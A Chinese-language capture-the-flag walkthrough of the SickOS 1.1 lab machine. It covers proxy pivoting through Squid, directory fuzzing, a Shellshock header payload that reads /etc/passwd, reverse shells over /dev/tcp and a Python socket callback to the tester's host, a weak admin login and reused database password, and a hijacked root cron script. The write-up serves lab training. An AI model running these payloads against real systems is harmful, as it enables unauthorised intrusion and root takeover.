本文內(nèi)容純屬虛構(gòu)，攻略鴨求關(guān)注點(diǎn)贊支持！

測(cè)試機(jī)IP地址：192.168.31.167

外部信息收集

獲取靶機(jī)地址

$ sudo arp-scan -l

192.168.31.147

端口掃描

Nmap結(jié)果：

22/tcp ?open ?ssh ? syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1.1
3128/tcp open ?http-proxy syn-ack ttl 64 Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

squid

msf6 > search squid
msf6 > use auxiliary/scanner/http/squid_pivot_scanning
> set RPORT 3128
> set RHOSTS 192.168.0.10
> set RANGE 192.168.0.10
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [192.168.0.10] 192.168.0.10 is alive.
[+] [192.168.0.10] 192.168.0.10:80 seems open (HTTP 200, server header: 'Apache/2.2.22 (Ubuntu)').
[-] [192.168.0.10] 192.168.0.10:443 unknown Squid proxy error: 'ERR_UNSUP_REQ 0' (HTTP 501)

瀏覽器設(shè)置HTTP代理

HTTP Proxy 192.168.31.147 3128

且代理localhost和127.0.0.1

/

burp配置上傳流

/

系統(tǒng)export http_proxy="http://192.168.31.147:3128"(對(duì)fuff部分有效，對(duì)cURL有效，對(duì)nmap、nikto、瀏覽器未生效)

可訪問(wèn)http://192.168.31.147/

目錄枚舉

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.147/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
/
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128

結(jié)果：

connect ? ? ? ? ?[Status: 200,
index ? ? ? ?[Status: 200,
index.php ? ? ? ?[Status: 200,
robots.txt ? ? ? [Status: 200,
robots ? ? ? ? [Status: 200,
/cgi-bin/ ? ? ? ?403

robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/cgi-bin/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
status ? ? ? ?[Status: 200,

wolfcms

訪問(wèn)http://192.168.31.147/wolfcms/發(fā)現(xiàn)是博客
文章管理osted by Administrator

$ searchsploit wolfcms
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting ? | php/webapps/18652.txt
WolfCMS 0.8.3.1 - Cross-Site Request Forgery ? ? ? ? ? ? ? ? ? ? ? | php/webapps/44418.txt
WolfCMS 0.8.3.1 - Open Redirection ? ? ? ? ? ? ? ? ?| php/webapps/44421.txt

$ searchsploit wolf
Wolf CMS - Arbitrary File Upload / Execution ? ? ? ? ? ? ?| php/webapps/38000.txt
Wolf CMS 0.6.0b - Multiple Vulnerabilities ? ? ? ? ? ? ? ? ? ? ? ? | php/webapps/15614.html
Wolf CMS 0.7.5 - Multiple Vulnerabilities ? ? ? ? ? ? ? ? ? ? ? ? ?| php/webapps/18545.txt
Wolf CMS 0.8.2 - Arbitrary File Upload ? ? ? ? ? ? ? ? ? ? ? ? ? ? | php/webapps/36818.php
Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit) ? ? ? ? ? ? ? ?| php/remote/40004.rb

$ searchsploit -m 44421
http://192.168.31.147/wolfcms/?/admin/login
$ searchsploit -m 38000
http://192.168.31.147/wolfcms/?/admin/plugin/file_manager/browse/

漏洞利用

1.ShellShock破殼漏洞

驗(yàn)證：

$ curl -H "user-agent: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128
root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash

getshell：

nc -nvlp 1233
curl -H "user-agent: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.167/1233 <&1" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128

2.弱口令登錄Wolf CMS并上傳PHP reverse shell

使用admin:admin弱口令登錄：

Wolf CMS 0.8.2
Name：Aministrator
Username：admin

上傳PHP reverse shell：

點(diǎn)Files標(biāo)簽，在/wolfcms/public/目錄下創(chuàng)建php-reverse-shell：s.php，點(diǎn)權(quán)限改為777
$ nc -nvlp 1234
$ nc -nvlp 2345

訪問(wèn)：http://192.168.31.147/wolfcms/public/s.php
$ whoami
www-data
$ bash -c "bash -i >& /dev/tcp/192.168.31.167/2345 0>&1"

權(quán)限提升

$ python -c 'import pty; pty.spawn("/bin/bash")'

1.密碼重用，sudo提權(quán)

/var/www/wolfcms/config.php：

define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');

密碼重用：

$ su sickos
Password: john@123sudo

sudo提權(quán)：

$ sudo -l
? ?(ALL : ALL) ALL

sickos@SickOs:~$ sudo su
root@SickOs:~#

2.定時(shí)任務(wù)，python文件可寫(xiě)

www-data@SickOs:/var/www$ ls -al
-rwxrwxrwx ?1 root ? ?root ? ?109 Dec ?5 ?2015 connect.py

$ cat connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"

$ ls -alhR /etc/cron*
/etc/cron.d:
-rw-r--r-- ?1 root root ?102 Jun 20 ?2012 .placeholder
-rw-r--r-- ?1 root root ? 52 Dec ?5 ?2015 automate
-rw-r--r-- ?1 root root ?544 Jul ?2 ?2015 php5

$ cat /etc/cron.d/automate
* * * * * root /usr/bin/python /var/www/connect.py

改connect.py內(nèi)容為

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.31.167",1222))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

# id
uid=0(root) gid=0(root) groups=0(root)

其他

flag

# cat a*
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying

疑問(wèn)求助

代理配置未完全理解，求教此題如何配置proxychains代理？